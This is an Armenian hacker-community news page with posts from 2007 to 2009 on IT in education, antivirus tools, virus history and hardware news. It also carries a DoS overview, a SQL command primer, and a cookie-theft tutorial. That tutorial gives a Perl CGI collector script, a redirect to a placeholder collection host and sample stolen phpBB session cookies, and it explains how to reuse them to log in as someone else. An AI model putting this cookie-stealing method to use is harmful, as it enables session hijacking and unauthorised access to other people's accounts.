Armenian Hackers Network

Հայ Նենգորդների Ցանց



նորություններ



ՏՀՏ-ի կիրառումը կրթության ոլորտում

ՏՀՏ-ի կիրառումը կրթության ոլորտում հանդիսանում է ինֆորմացոին հասարակության կարևոր ուղղություններից մեկը:

Իֆորմացիոն հասարակություն-մարդկության հասարակության զարգացման նոր փուլ, որի գլխավոր արտադրությունն են համարվում ինֆորմացիան և գիտելիքը: Ինֆ. Հաս. կարևոր բնութագրիչներից է` հասարակության կյանքում ինֆորմացիայի և գիտելիքների դերի կարևորության ավելացումը, գլոբալ ինֆորմացիոն տարածության ստեղծումը, որն ապահովում է մարդկանց համագործակցությունը, նրանց հասանելիությունը համաշխարհային ինֆորմացիոն ռեսոուրսներին, այդ ոլորտներում մարդկանց պահանջների բավարարումը:

21-րդ դար, ինֆորմացիոն հասարկությունը փորձում է լուծել իր խնդիրները տեղեկատվական տեխնոլոգիաների միջոցով: Եթե դիտարկենք տարբեր ոլորտները, որոնցում տեխնոլոգիական միջոցները կիրառվել են 20-րդ դարում, ապա բոլոր փորձերը եղել են հաջողված: Այսօր, երբ ՏՀՏ-ն մուտք է գործել կրթության ոլորտ, այն ենթադրում է նոր մոտեցումներ դասավանդման մեջ, նոր ձեքբերումներ կրթության մեջ: Այս պայմաններում կարևորվում է դպրոցի դերը: Ժամանակի պահանջներին համապատասխան կրթական պրոցեսի նոր մոդելը կարողանում է իրականացնել առաջադրված խնդիրների լուծումները: Այստեղ մեծ դեր է խաղում տեղեկատվական տեխնոլոգիական միջոցների ակտիվ կիրառումը, քանի որ

- Այն սովորողներին թույլ է տալիս ձեռք բերել նոր արժեքներ, նոր որակներ, որոնք անհրաժեշտ են ժամանակակից հասարակության մեջ ապրելու և աշխատելու համար:
- Այն հանդիսանում է էֆեկտիվ միջոց ուսուցման նոր ձևերի և մեթոդների զարգացման համար:
- Այն հանդիսանում է անհրաժեշտ պայման կրթության ընդհանուր նորացման համար:

ՏՀՏ-ի էֆեկտիվ կիրառումը պայմանավորված է մի քանի հանգամանքներով, որոնցից կարելի է առանձնացնել`
-Դպրոցներում անհրաժեշտ նորացված տեխնիկական և ծրագրային միջոցների բացակայությունը
-Ուսուցիչների` տեղեկաատվահաղորդակացան տեխնոլոգիաներին տիրապետելու հմտությունների թերացումը, այս ոլորտում նրանց փորձի պակասը
-Անհրաժեշտ ուսումնական էլեկտրոնային ձեռնարկների ձեռքբերման դժվարությունները, կամ հայերեն լեզվով նյութերի սակավությունը:
Այսօր արդեն դպրոցներից շատերը համալրված են տեխնիկական միջոցներով, և հարց է առաջանում` դրանք համապատասխանում են նոր ծրագրերի կիրառման համար թե ոչ: Ուսուցիչներից շատերը հմուտ չեն համակարգչային ծրագրերի կիրառմամբ ստեղծելու կրթական նյութեր, որոնք բավականին օգտակիար կլինեն ուսուցման ժամանակ: 
Սակայն դպրոցներում առկա Microsoft Windows օպերացիոն համակագի ծրագրային ապահովմամբ համակարգիչներում, տեղակայված են գոնե Microsoft Office ծրագրային փաթեթի Ms Word, Ms Excel, Ms powerPoint ծրագրերը: Այս ծրագրերից գոնե Ms Word-ը բավականին մատչելի է, և կիրառվում է ուսուցիչների կողմից:
Ուսուցիչներից շատերը կիրառում են այս ծրագրային միջոցները գոնե թեստային առաջադրանքներ պատրաստելու համար, իսկ MsPowerPoint-ը` դասը պրեզենտացիայի ձևով ներկայացնելու համար: Այս ծրագրի կիրառումը հարստացնում է դասը էմոցիոնալ գեղագունությամբ, հոգեբանորեն թեթևացնում է յուրացման պրոցեսը, առաջացնում է կենդանի հետաքրքրություն տվյալ առարկայի նկատմամբ: Իսկ այն ուսուցիչները, ովքեր դեռևս չեն կիրառել` տիրապետելով միան MsWord ծրագրին` դժվարություն չի լինի յուրացնելու ինտերֆեյսը և կիրառելու այն: 
MsPowerPoint-ի ամենատարածված կիրառման ձևը` նկարներ, հակիրճ տեքստեր, երաժշտություն: 
Ես գտնում եմ, որ այսօր դպրոցում անհրաժեշտություն է գոնե այս ծրագրերի կիրառումը, քանի որ արդի ժամանակաշրջանում երեխան այնքան ինֆորմացիա է ստանում կողմնակի աղբյուրներից, որ ստանդարտ դասագրքային նյութերը արդեն նրան չեն բավարարում: Ուստի, պետք մշակել այնպիսի ուսումնառության նյութեր, որոնք կհետաքրքրեն այսօրվա աշակերտին: Ուսումնառության նոր մեթոդական ներկայացումները կօգնեն աշակերտի գիտելիքները ավելի հաջողված ձևով կարողությունների և հմտությունների վերածելու պրոցեսին, քանի որ տեսողական հիշողության առավելությունները առավել ակնհայտ են:


Հոդվածի հեղինակ` Վանաձորի N19 դպրոցի ինֆորմատիկայի ուսուչուհի Անուշ Թորոսյան

Բոլոր նրանք, ովքեր կցանկանան իրենց հոդվածները` նվիրված ՏՏ ոլորտին, տեղադրել մեր կայքում, կարող են դիմել մեզ: Էլ փոստ` vitya @ hay .am

տեղադրվել է 6/27/2009 5:21:58 AM-ին, vityaի կողմից

Հակավիրուսային Պաշտպանություն

Ներկայումս լայն տարածում են ստացել վիրուսային ծրագրերը: Դրանցից պաշտպանվելու համար կան բազմաթիվ միջոցներ:
Սակայն ամենակարևորը` հակավիրուսային ծրագրի առկայությունն է: Հայաստանում լայն տարածում են ստացել DR. WEB , Kaspersky, Nod, Mcafee, Avast և այլ բազմաթիվ ծրագրեր:
Թե ինչ հակավիրուսային ծրագիր օգտագործել, որոշում է ցանկացած մարդ ինքը:
Ինչ վերաբերվում է մեզ, ապա մենք օգտագործում և խորհուրդ կտանք օգտագործել հետևյալները`
1.Կազմակերպությունների համար (ցանցային) - Symantec Corporate Edition Client-Server
2.Անհատական տնային համակարգիչների համար - Grisoft ընկերության AVG 8.0

Թե ինչու հենց այս հակավիրուսային ծրագրերը, դուք պատասխանը կստանաք որոշակի ժամանակ օգտագործելուց հետո:
Ավելացնոմ, որ մենք անընդհատ կապի մեջ ենք գտնվում նաև Grisoft-ի հետ և Հայաստանում հայտնաբերված նոր վիրուսները ուղարկում ենք իրենց` բազայում ավելացնելու համար:

Պաշտոնական կայքերն են`

Grisoft
AVG 8.0
Symantec

տեղադրվել է 9/27/2008 3:11:18 PM-ին, vityaի կողմից

DOS հարձակումներ

TCP / IP Ցանցային տեխնոլոգիայի մասսայական տարածմանը զուգընթաց խակերները մշակեցին միջոցներ այնպիսի գործողությունների կատարման համար, որոնք միանշանակ կարելի է բնութագրել որպես հիպերտեռորիզմ: Այս գործողությունները, չնայած նրանց բազմազանությանը, ուղղված են մեկ ընդհանուր նպատակի` ցանցային աշխատանքի խափանմանը և կոչվում են DOS (Denial of Service – սպասարկման հրաժարում) հարձակումներ:


 Ամեն տարի  DOS հարձակումները ջնջում են հազարավոր կայքերի տվյալներ: Այդ թվում նաև այնպիսի հանրահայտ կայքեր, ինչպիսիք են Yahoo, eBay, CNN.com, www.Microsoft.com  և այլն: Որպես կանոն այս հարձակումների արդյունքում սերվերները փչանում են ծանրաբեռնման հետևանքով և պատճառում միլիոնավոր դոլլարների վնասներ:
 
  DOS հարձակումների արդյունքն են հանդիսանում համակարգչային համակարգերի հասցնումը այնպիսի իրավիճակի, երբ նրանց նորմալ գործունեությունը դառնում  է անհնար: Այս արդյունքի կարելի է հասնել տարբեր միջոցների կիրառմամբ, և դրանից ելնելով` մենք DOS հարձակումները կբաժանենք խմբերի, որպեսզի ավելի հեշտ լինի կողմնորոշվել:
 
  I խումբ - սերվեր է ուղարկվում մեծ քանակությամբ փաթեթներ, որոնց սերվերը չի հասցնում ընդունել և մշակել,
  II խումբ - սերվեր է ուղարկվում հատուկ մշակված փաթեթներ, որոնք ստիպում են համակարգչին ծախսել իր ռեսուրսները (կենտրոնական պռոցեսոր, հիշողություն և այլն) տվյալ  պակետները մշակելու համար, որից հետո սերվերը դուրս է գալիս շարքից:
  III խումբ - սերվեր է ուղարկվում հատուկ փաթեթներ, որոնք  խախտում են համակարգչի օպերացիոն համակարգի աշխատանքը: Այսպիսի հարձակումների ժամանակ օգտագործվում են ծրագրային միջոցների թույլ կետերը:
  IV խումբ - սերվեր է ուղարկվում հատուկ փաթեթներ, որոնք ստիպում են սերվերին փոխել կոնֆիգուրացիան, ինչը բերում է աշխատունակության անկման և նույնիսկ ոչ ճիշտ անկման: Այս հարձակումները նախորդ խմբի պես օգտագործում են ծրագրային միջոցների թույլ կետերը:


Հոդվածի հեղինակ` AGhack

տեղադրվել է 9/26/2008 10:47:34 AM-ին, vityaի կողմից

SQL հարձակում (SQL injection)

Սկզբի համար մի փոքր նկարագրենք SQL տեխնոլոգիան, որպեսզի իմանանք, թե ինչն է հանդիսանում մեր հարձակման թիրախը:
 Ընդհանրապես SQL տվյալների բազան իրենից ներկայացնում է աղյուսակների հավաքածու, որտեղ ամեն մեկ վանդակը որոշակի ինֆորմացիա է պարունակում: SQl –ում կան այդ տվյալների հետ աշխատելու նպատակով ստեղծված մի քանի հրամաներ: Դրանք են`
 SELECT
 INSERT 
 UPDATE
 DELETE 
 DROP
 UNION
Հրամանի վերջը ցույց է տալիս “ ; ” նշանը
SELECT
Նախատեսված է աղյուսակից տվյալների դուրս բերման համար:
Ահա օրինակը
SELECT ՙԴաշտի անվանումը՚ FROM ՙԱղյուսակի անվանումը՚ WHERE ՙԴաշտի անվանումը՚ = ՙնշանակությունը՚;
WHERE փոփոխականը պարտադիր չէ, իսկ SELECT * FROM users; -ը ցույց է տալիս ՙusers՚  աղյուսակի բոլոր տվյալները
INSERT
Նախատեսված է աղյուսակից տվյալների դուրս բերման համար:
Ահա կառուցվածքը`
INSERT INTO ՙԱղյուսակի անվանումը՚ (դաշտերի անվանումը) VALUES (դաշտերի նշանակությունը));
Օրինակ`
INSERT INTO users (login, password) VALUES ('armen', '12345');
Այս հրամանը “users” աղյուսակում նոր տող կավելացնի, որտեղ “login” սյունակում գրված կլինի “armen”, իսկ “password” – ում “12345”
UPDATE
Նախատեսված է աղյուսակում տվյալների փոփոխման համար:
Ահա կառուցվածքը` UPDATE ՙԱղյուսակի անվանումը՚ SET ՙԴաշտի անվանումը՚=ՙդաշտի նշանակությունը՚,..,ՙ...՚=ՙ...՚ WHERE ՙդաշտի անվանումը՚=ՙդաշտի նշանակությունը՚;
Օրինակ
UPDATE users SET password='12345' WHERE login='armen';
Փոփոխություն է կատարում "password" տողում
DELETE
Նախատեսված է աղյուսակից տվյալների ջնջման համար
Ահա կառուցվածքը` DELETE FROM ՙԱղյուսակի անվանումը՚ WHERE ՙդաշտի անվանումը՚=ՙդաշտի նշանակությունը՚;
Օրինակ
DELETE FROM users WHERE login='armenr';
Ջնջում է վերը նկարագրած տողը:
DROP
Նախատեսված է աղյուսակի ջնջման համար:
Ահա կառուցվածքը`  DROP TABLE ՙԱղյուսակի անվանումը՚:
Օրինակ`
DROP TABLE users;
Ջնջում է "users" աղյուսակը:
UNION
Թույլ է տալիս վերցնել տվյալներ միանգամից մի քանի աղյուսակներից:
Սրանցից բացի կան նաև
CREATE DATABASE ՙբազայի անվանումը՚ - նոր տվյալների բազայի ստեղծում
USE ՙբազայի անվանումը՚ - Տվյալներ բազայի ընտրում
GRANT ՙիրավունք՚ ON ՙբազայի անվանումը՚.ՙԱղյուսակի անվանումը՚TO ՙօգտագործող՚@ՙհոսթ՚ IDENTIFIED BY 'ծածկագիր'; (Օրինակ` "GRANT all ON Things.* TO armen@localhost IDENTIFIED BY '12345';") -  ՙThings՚ բազայում բոլոր իրավունքներով ավելացնում է ՙarmen՚ օգտագործողին` ՙ12345՚ ծածկագրով:
 
 
Հոդվածի հեղինակ` AGhack

տեղադրվել է 9/25/2008 3:48:08 PM-ին, vityaի կողմից

CSS - ը որպես զենք

Cross-site scripting (CSS/XSS)-ը հզոր գործիք է, որի միջոցով կարելի է անօրինական մուտք ստանալ ցանցային տարբեր ռեսուրսների նկատմամաբ` օտար էլ. արկղեր, ֆորումներ, չատեր և այլն:

 
Որպեսզի օգտագործողը ամեն անգամ չհավաքի ծածկագիրը, երբ նա ֆորում է մտնում, ֆորումի ստեղծողները մտածել են հեղինակության հաստատման միջոց` օգտագործելով cookie –ները: Այսինքն` օգտագործողի ծածկանունից և ծածկագրից ստեղծվում է տեքստային փաստաթուղթ, որը տեղադրվում է C:\...\...\Cookies հասցեում: Երբ օգտագործողը միանում է ֆորումին, սկրիպտը ստուգում է տվյալ ֆայլի առկայյությունը նրա համակարգչում: Եթե ֆայլը կա, ապա օգտագործողը համարվում է  ֆորումի օրինական օգտագործող:

եթե դու կարողանաս գողանալ այդ ֆայլի տվյալները և ուղարկես սերվեր, ապա նրանք քեզ կընդունեն որպես իրենց օրինական օգտագործողի: JavaScript –ը ունի այդպիսի հնարավորություն:
 
Cooki-ների գողացման գործընթացը.
 
Առաջին հերթին պետք է ստեղծվի cgi սկրիպտ, որը կընդունի տվյալները cooki – ներից և այն կհիշի մի նոր ֆայլում: Այսպիսին է այդ սկրիպտի տեսքը պերլում:

#!/usr/bin/perl -w
# բացում ենք cookies.txt –ը ինֆորմացիայի ավելացման համար
open COOKIES,">>../cookies.txt";
print "Content-Type: text/html\n\n";
# ֆայլի մեջ ավելացնում ենք մի կետ, որի օգնությամբ
# կարող ենք տեսնել, թե որտեղից են սկսվում գողացված տվյալները
print COOKIES "----------- new cookie -----------\n";
print COOKIES "$ENV{'QUERY_STRING'}\n";
# ավելացնում ենք կետ, որտեղ պետք է վերջանան գողացված տվյալները
print COOKIES "---------- end of cookie ---------\n\n";
# Փակում ենք cookies.txt – ֆայլը
close COOKIES;
 
Այս կոդը պետք է հիշվի cookie.cgi ֆայլում:
Առաջին քայլը կատարված է: Հիմա մենք ունենք սկրիպտը: Նրան կփոխանցվեն տվյալներ cookie –ից, որն էլ իր հերթին այդ տվյալները կավելացնի cookies.txt ֆայլում: Արդյունքում այս ֆայլում կկրկնօրինակվեն այն բոլոր օգտագործողների cookie-ները, որոնք կնայեն ֆորումը կամ կկարդան չատում այն հաղորդագրությունը, որը պարունակում է այդ սկրիպտը աշխատեցնող  ինչ-որ կոդ: Այդ կոդի օրինակ է հանդիսանում

կոդը: Այս սկրիպտի իրականացման ընթացքում բրոուզերը redirect կկատարի  http://something/cgi-bin/cookie.cgi հասցեում գտնվող սկրիպտը:
 
Ֆորումից գողացված տեղեկությունները ունեն հետևյալ տեսքը.
b=b;%20hotlog=1;%20phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22471%22%3B%7D;%20phpbb2mysql_sid=a5cadcb43f68a1dcd64b9324f4e7162f;%20phpbb2mysql_t=a%3A3%3A%7Bi%3A742%3Bi%3A1075844973%3Bi%3A744%3Bi%3A1075845106%3Bi%3A745%3Bi%3A1075845231%3B%7D
Այս տվյալները մշակելու համար պետք է օգտագործել Cookie Editor ծրագիրը, որը վերցնելով այս տվյալները` կստեղծի cookie, որն էլ օգտագործելով հնարավոր կլինի մուտք գործել տվյալ ֆորումները և այլ տեղեր:
 
Հոդվածի հեղինակ` AGhack
 

տեղադրվել է 9/25/2008 3:40:51 PM-ին, ludwigի կողմից

Նոր Հայկական ՏՏ Ֆորում

Արդեն իսկ գործում է մեր կողմից պատրաստված նոր ֆորումը` կապված ՏՏ ոլորտի հետ: Այն հայերեն է և նախատեսված է միայն հայ շահագործողների համար: Գրանցվեք ֆորումում և ակտիվորեն մասնակցեք քննարկումներին, որտեղ Դուք կստանաք Ձեզ հետաքրքրող բազմաթիվ հարցերի պատասխանները` կապված համակարգչային աշխարհի հետ և ոչ միայն:

Բարի գալուստ Հայկական ՏՏ Ֆորում

տեղադրվել է 8/29/2008 5:05:56 AM-ին, vityaի կողմից

HAY Converter .NET

Ծրագիրը իրենից ներկայացնում է տեքստային խմբագրիչ, որը ունի հնարավորություն կատարելու տեքստային փոխակերպումներ: Իրականացնում է UNICODE-ANSI և հակառակը , նաև UNICODE-WSNC և հակառակը փոխակերպուներ: Այն առավել օգտակար կլինի վեբ ծրագրավորողների համար: Ծրագիրը ամբողջությամբ հայերեն է: Ծրագրի պահանջներն են` Windwos XP, Windwos 2003 կամ Windows Vista (.NET Framework 2 պարտադիր է բոլորի համար):
Հարցերի համար այցելեք` վեբվարպետների ֆորում
Ծրագրի կայք` ՀԱՅ.եմ
 
HAY Converter .NET

տեղադրվել է 4/15/2008 2:36:19 PM-ին, vityaի կողմից

HAY Dictionary

ՀԱՅ Թիմի կողմից պատրաստվել է անգլերեն–հայերեն բառարան :
Ծրագիրը օգտագործելու համար հարկավոր է, որ համակարգչում տեղադրված լինի .NET Framework 2:
 
Դուք կարող եք նաեւ օգտագործել բառարանի վեբ տարբերակը`
 
http://www.hay.am/?lang=arm&page=dictionary

տեղադրվել է 12/10/2007 10:11:04 AM-ին, vityaի կողմից

Graphics Տեղեկատվական Տեխնոլոգիաներ

Արդեն իսկ գործում է ՀԱՅ Թիմի գործընկեր Graphics Տեղեկատվական Տեխնոլոգիաների ինտերնետային կայքը: Բացի բազմաթիվ համակարգչային ծառայությունների մատուցումից, Graphics-ի ինտերնետային կայքի պատրաստումը ի սկզբանե նախատեսված է եղել Հայաստանում տեղեկատվական տեխնոլոգիաների զարգացման համար: Կայքը նոր է և այն աստիճանաբար կբարեփոխվի և հուսով ենք կնպաստի Հայաստանում ինտերնետի զարգացմանը:

տեղադրվել է 10/18/2007 6:00:41 PM-ին, vityaի կողմից

Նոր ինտերնետ կայք և էլ-գիրք ՀԱՅ Թիմի կողմից

ՀԱՅ Թիմի կողմից պատրաստվել է նոր կայք` նվիրված ծրագրավորմանը: Այն հիմնականում պարունակում է visual basic և asp կոդեր, սակայն լեզուների քանակը ժամանակի ընթացքում կավելանա:

Ստեղծվել է նաև visual basic 6.0 ծրագրավորման լեզվի գիրք` էլեկտրոնային տարբերակով:

տեղադրվել է 9/21/2007 6:45:15 PM-ին, vityaի կողմից

416 ԳԲ ծավալի հիշողություն 2.5 դույմանոց կոշտ սկավառակի վրա

BiTMICRO ընկերությունը ցուցադրել է իր նոր  SSD-կոշտ սկավառակը` E-Disk Altima ATA-133: Այն 2.5 դույմանոց է և կարող է պարունակել մինչև 416 ԳԲ ծավալի ինֆորմացիա: Բացի դրանից, այն համեմատած SATA HDD այլ սկավառակների հետ, շատ արագագործ է (մինչև 800 ՄԲ գրանցման ժամանակ և 1064 ՄԲ կարդալու ժամանակ), կայուն է, քիչ էներգիա է ծախսում և որ ամենկակարևորն է համատեղելի է նոութբուքերի և ԿՊԿ-ների հետ: Ըստ  BiTMICRO ընկերության, E-Disk Altima ATA-133 սկավառակը վաճառքի կհանվի 2008 թ-ի մարտին:

տեղադրվել է 9/16/2007 5:29:18 PM-ին, vityaի կողմից

Ծրագրավորողների օր

Ամեն տարվ 256-րդ օրը նշվում է որպես ծրագրավորողների օր: Այդ կապակցությամբ շնորհավորում ենք բոլոր ծրագրավորողներին :) :

տեղադրվել է 9/16/2007 5:18:41 PM-ին, vityaի կողմից

Հայտնվել է նոր վիրուս, որը ջնջում է MP3 ֆայլերը

Հայտնվել է նոր վիրուս, որը ջնջում է վարակված համակարգչում գտնվող բոլոր MP3 ֆայլերը:
Վիրուսի անունը Deletemusic է և տարածվում է շարժական սկավարակների միջոցով: Սկավառակին դիմման ժամանակ վիրուսը աշխատում է և իրեն գրանցում է համակարգչում առկա բոլոր սկավառակների վրա, որից հետո իրեն գրանցում է ավտոբեռնավորման մեջ:
Համակարգչի վերաբեռնավորումից հետ վիրուսը ջնջում է բոլոր MP3 ֆայլերը:
Այսպիսի վիրուսները նորություն չեն համակարգչային աշխարհում: Այդպիսի վիրուսներից են Klez-F `2002 թ., Scrambler կամ Mylife-G:

տեղադրվել է 8/4/2007 1:06:14 PM-ին, vityaի կողմից

25 տարի առաջ հայտնվեց առաջին համակարգչային վիրուսը

Հուլիս ամսին լրացավ առաջին համակարգչային վիրուսի 25 ամյակը: Շատ փորձառու համակարգչային մասնագետներ գտնում են, որ առաջին համակարգչային վիրուսը հայտնվել է 80-ականների 2-րդ կեսին,սակայն 1-ին վիրուսը գրվել է մինչ IBM համատեղելի անհատական համակարգիչների ստեղծումը:
"Elk Cloner" վիրուսը,որը տարածվում էր Apple II-ի ինֆորմացիոն դիսկետաների միջոցով,համարվում է 1-ին համակարգչային վիրուսը: Ենթադրվում է, որ "Elk Cloner" վիրուսի հեղինակը եղել է Ռիչ Սկրենտան (Rich Skrenta), որը եղել է այդ ժամանակ 15 տարեկան և բնակվելիս է եղել Պիցբուրգ քաղաքում: Նա այդ վիրուսը գործարկել է 1982 թ. հուլիս ամսին:
Վիրուսը իրենից որևէ վտանգ չէր ներկայացնում և աշխատելիս է եղել միայն Apple DOS-ով: Վիրուսը հիմնականում տարածված է եղել նրա ընկերների և ուսուչի մոտ:
Ինչպես շատ հին վիրուսներ, "Elk Cloner"-ը նույնպես առանձնանում էր իր վիզուալ արտահայտումներով: Ամեն 50-րդ գործարկման ժամանակ վիրուսը արտապատկերում էր որևէ բանաստեղծություն` "Elk Cloner: The program with a personality" վերնագրով:

տեղադրվել է 7/16/2007 8:45:05 PM-ին, vityaի կողմից

Սպամերներն օգտագործում են նոր տեխնոլոգիաներ զտիչները շրջանցելու համար

Սպամերները սկսել են օգտագործել կոդավորված կից ֆայլեր զտիչ համակարգերը շրջանցելու համար, տեղեկացնում է Email Systems ծառայություններ մատուցողը:

Տեխնոլոգիան հիմնված է նրա վրա, որ շատ աղբի դեմ պայքարող համակարգեր չեն կարող ստուգել նամակաները, որոնք պարունակու եմ կոդավորված կամ գաղտնաբառ պարունակող կից ֆայլեր, և կարծում են, որ դրանք նույնը չեն: Առանց ինչ-որ կանոնը, այդ համակարգերը պարզապես կհասցնեն այդ նամակները հասցեատերերին, հանձնելով սպամերներին հաղթական գավաթը:

Վերջերս Email Systems-ը նկատել է քիչ քանակով նմանատիպ աղբեր, որոնք պարունակել են մի շարք Տրոյաններ:

Ստացողները կկարողանային բացել տվյալ կից ֆայլերը, երբ տեսնեյին այնպիսի բառեր, ինչպիսիք են՝ «Worm Detected!», «Virus Detected!», «Spyware Alert!» և «Warning!»: Գաղտնաբառն ուղարկվում է նամակի մեջ:

Գրեգ Միլլերն ասում է՝ «Արդեն անցել են ժամանակները, որ աղբ ուղարկվում է մեկի կողմից»: Այդպիսի աղբերի մեծ մասն արդեն ավտոմատացվել է ռոբոտ ծրագրերի միջոցով, որն էլ բարդացնում է սպամի կանխումը:

Քանի որ հակասպամային սիստեմները սկսեցին մշակել նկարները և կանխել նմանատիպ աղբը, սպամերները գտան նոր միջոցներ:

Նորատիպ հարձակուներին վերջ դնելու լավագույն տարբերակը արգելելն է կոդավորված նամակագրությունը:

տեղադրվել է 7/2/2007 5:14:06 PM-ին, ludwigի կողմից

Հիմնահարթակ արտադրող Asustek-ը բաժանվելու է երեք մասի

Համակարգչային հիմնահարթակների արտադրության մեջ հայտնի անուն Asustek Computer Inc-ը բաժանվելու է երեք տարբեր կազմակերպությունների մինչև Հունվար ամիսը: Այն բաժանելու է իր բրենդը իրեն շայմանագրային արտադրողական գործողություններից:

«Մենք կարծում ենք սաս կնպաստի մեր մրցունակության յուրաքանչյուր բնագավառում», ասել է Ջոննի Շին, Asustek-ի ներկայացուցիչը, Տայփեյում լրագրողների հետ հարցազրույցի ժամանակ:

Acer Inc.-ը՝ աշխարհի երրորդ ամենամեծ համակարգիչ արտադրող ընկերություն, առաջիններից էր, որ սկսեց արտադրողական գործունեություն Թայվանում: Տարիներ առաջ կազմակերպությունը բաժանվեց երեք մասի, ներառելով հետևյալ երկու կազմակերպությունները՝

  1. Wistron Corp.՝ հիմանական պայմանագրային արտադրությունը
  2. BenQ Corp.՝ հեռախոսների և տեսասարքերի արտադրությունը

Մարդիք կարծում էին, որ սա վերջ կդնի Acer կազմակեպությանը, բայց ի հակառակ այդ ամենին Acer-ն աճեց, և նույնիսկ սկսեց կատարել Xbox 360-ի պատվերները Microsoft Corp.-ի կողմից:

Asustek-ի անվանական բիզնեսը կշարունակի գործել նույն անվան տակ, սակայն նրա համակարգչային արտադրությունը կդառնա Unihan Technology Corp.: Asustek-ի տուփերի, մոդուլների և ոչ համակարգչային արտադրությունները կդառնա Pegatron Technology Corp.:

Asustek-ն ասում է, որ բաժանումը տեղի կունենա 2008 թվականի, հունվարի 1-ին

Բաժանումից հետո Pegatron-ը կունենա ամենամեծ շահույթը:

Եռակողմ բաժանումը պահանջում է կառավարության որոշումը մինչ այն կթույլատրվի իրականացնել:

տեղադրվել է 7/2/2007 5:13:47 PM-ին, ludwigի կողմից

Հրատարակվել է Windows Vista-ում առկա անցքերի մասին հաշվետվություն

Microsoft ընկերության անվտանգության գծով բաժնի պետ Ջեֆ Ջոնսը հրատարակել է օպերացիոն համակարգերում առկա անվտանգության վերաբերյալ հաշվետվություն: Ըստ այդ տվյալների, առաջին 6 ամիսների ընթացքում Windows Vista-ում հայտնաբերվել և ուղղվել են տասներկու անցքեր: Համեմատության համար ասենք, որ այդ նույն ժամանակահատվածում հայտնաբերված անցքերը Windows XP-ում եղել են 36-ը: Սակայն Windows Vista-ում դեռևս առկա են 15 հայտնի անցքեր, իսկ Windows XP-ում դրանց թիվը 3 է եղել:
 
Այդ հաշվետվության մեջ նշված է եղել նաև այլ օպերացիոն համակարգերում առկա անցքերի մասին: Մասնավորապես նշված է եղել Red Hat Enterprise Linux, Ubuntu և Apple Mac OS X օպերացիոն համակարգերում առկա անցքերի մասին: Ըստ այդ հաշվետվության նույն շամանակահատվածում Red Hat Enterprise Linux 4 օհ-ում հայտնաբերվել են 280 անցքեր, որոնցից 86 եղել են շատ վտանգավոր, Ubuntu 6.06-ում եղել են 145, որոնցից 47-ը վտանգավոր, Mac OS X-ում եղել է 60 անցք, որից 1/3 վտանգավոր:

Ջոնսը նշել է նաև, որ Microsoft-ը միջին հաշվով 29 օրվա ընթացքում ուղղում է հայտնաբերված անցքերը, Apple-ը 46 օրվա ընթացքում, իսկ Red Hat-ը` 107:

տեղադրվել է 6/24/2007 12:56:52 PM-ին, vityaի կողմից